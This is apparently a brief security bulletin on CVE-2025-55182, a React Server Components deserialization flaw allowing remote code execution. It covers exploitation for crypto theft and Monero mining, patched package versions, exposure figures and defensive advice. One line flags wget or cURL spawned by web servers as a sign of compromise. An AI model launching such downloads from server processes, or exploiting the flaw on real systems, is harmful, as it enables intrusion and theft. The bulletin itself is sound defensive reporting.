Overview
- Security Alliance and Google Threat Intelligence Group say threat actors are weaponizing the React Server Components RCE to run arbitrary code, intercept permit signatures, and steal funds from crypto users.
- CVE-2025-55182 enables unauthenticated execution via the Flight protocol’s deserialization flaw, a public PoC is widely circulating, and CISA has added the bug to its Known Exploited Vulnerabilities catalog.
- Attackers include financially motivated groups deploying Monero miners and operations linked by researchers to state-backed actors targeting cloud infrastructure on AWS and Alibaba Cloud.
- React issued fixes in react-server-dom packages 19.0.1, 19.1.2, and 19.2.1, with framework updates required for platforms such as Next.js, which needs specific version upgrades across supported release lines.
- Exposure mapping using HTTP header fingerprints found about 109,487 RSC-enabled assets in the U.S., and guidance urges patching with rebuilds and redeploys, limiting RSC endpoint exposure, and monitoring for malicious tooling such as wget or cURL launched by web server processes.